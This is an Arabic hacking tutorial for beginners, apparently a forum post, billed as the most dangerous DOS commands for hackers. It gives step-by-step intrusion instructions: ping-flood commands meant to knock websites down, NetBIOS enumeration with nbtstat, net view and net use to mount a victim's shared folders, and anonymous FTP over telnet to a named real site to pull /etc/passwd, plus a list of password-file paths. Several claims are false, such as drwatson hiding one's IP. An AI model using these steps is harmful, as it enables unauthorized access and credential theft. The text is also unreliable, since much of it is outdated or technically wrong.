اخطر واغرب الأوامر بالدوس للهكر:

بسم الله الرحمن الرحيم
   بصراحة اليوم جايب درس مهم جدا ولازم تقراه وانت مركز يعني اذا مافهمت الدرس انا بقلك لعاد تكمل في دورة الاختراق للمبتدئين وبصراحة
   هذا الدرس مو للمبتدئين ابدا بس انا حابب اعطيكم فكره عنو وان شاء الله راح تفهمو لما تركزو وتقرو اكتر من مره
 
   اخطر واغرب الأوامر بالدوس للهكر:
   لتدمير المواقع:
   ping -t www.***.com
   هذا الأمر يقوم بالضغط على المضيف
   ping -t -a -f www.***.com
   أماهذا الأمر الشاطر فيقوم باعطاء الاوامر للمستضيف
   ping www.***.com
   وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج "ping "بعدها الاي بي
   com/com.wav
   com3/com3/.wav
   com1/com.wav
   وهذه الاوامر للهجوم اكتب الموقع أوهذا الامر أو الاي بي يكون افضل
   ping -w timeout www.***.com
   وهذا الامر يستعمل لمعرفة سرعة المواقع
   NETSTAT -S
   هذه المنافذ في جهازك
   NETSTAT -A
   هذا الامر لترىالمنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
   NETSTAT -N
   هذا الامر لأخراج الاي بي ارسل اي ملف لمن معك على الماسنجر وهو يحمل اكتبه سيأتيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
   NETSTAT -P
   هذا منافذ البروتكوكل
   drwatson
   هذا الامر لأخفاء الاي بي
   والان هذه اوامر خطيرة
   الإختراق عن طريق NetBios Attack
   هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
   وللتجربة على نفسك كمثال : أحصل على IP الخاص بجهازك بواسطة هذا البرنامج الصغير ."NetBios Attack"
   1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

   2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

   3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

   4- سيظهر لك الجدول التالى :
   NetBIOS Remote Machine Name Table
   ____________________________________
   Name Type Status
   -------------------------------------------
   J-1 <00> UNIQUE Registered
   WORK <00> GROUP Registered
   J-1 <03> UNIQUE Registered
   J-1 <20> UNIQUE Registered
   WORK <1E> GROUP Registered
   WORK <1D> UNIQUE Registered
   __MSBROWSE__.<01>GROUP Registered
   ملحوظة : تم حذف المعلومات الأصلية من الجدول .

   5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.

   6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
   Net view \\<insert ip_address here>

   7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
   Shared resources at \\ip_address
   Sharename Type Comment
   MY DOCUMENTS Disk
   TEMP Disk
   8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
   Net use x: \\<insert IP address here>\temp
   طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
   * لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
   User name-Password
   وهما يكونان محفوظين في ملف يسمي
   PASSWD غالبا
   بعض المواقع تضع هذا الملف في الإف تي بي
   ما هو إف تي بي؟
   FTP=File Transfer Protocol بروتوكول نقل الملفات
   تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
   start==>run إبدأ ثم تشغيل
   واكتب telnet
   سيفتح التلنت اضغط علىRemote System ==> connect
   ثم اكتب الموقع في Host Name مثلا
   kahane.org أو الآيبي الخاص به
   وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
   ثم اضغط connect
   وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
   user anonymous
   ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
   passtttttttt@yahoo.com
   اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
   ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
   بعدها سنحصل على ملف الباسوورد
   قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
   cute ftp - ws_ftp
   مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
   ftp.kahane.org
   لتحصل على الملف في التلنت اكتب
   retr /etc/passwd
   /etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
   Sunos 5.0 etc/shadow او etc/passwd
   Linux etc/shadow او etc/passwd
   BSD4.3 –RENO etc/master.passwd
   AIX etc/security/passwd
   NT ويندوز scripts/passwd
   وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها::
   -------------------------------------
   في ملاحظة الكل الان يمكن قاعد يدور عليها وهي كالتالي
   === كيف اطلع ip الخاص فيني ====
   اقلك كيف الطريقة اسهل من السهل === ادخل الدوس واكتب الامر التال(ipconfig)
   راح يطلعلك معلومات كتيره ومن ضمنها هالمعلومه هي ( IPv4 Address. . . . . . . . . . . : 192.***.*.3)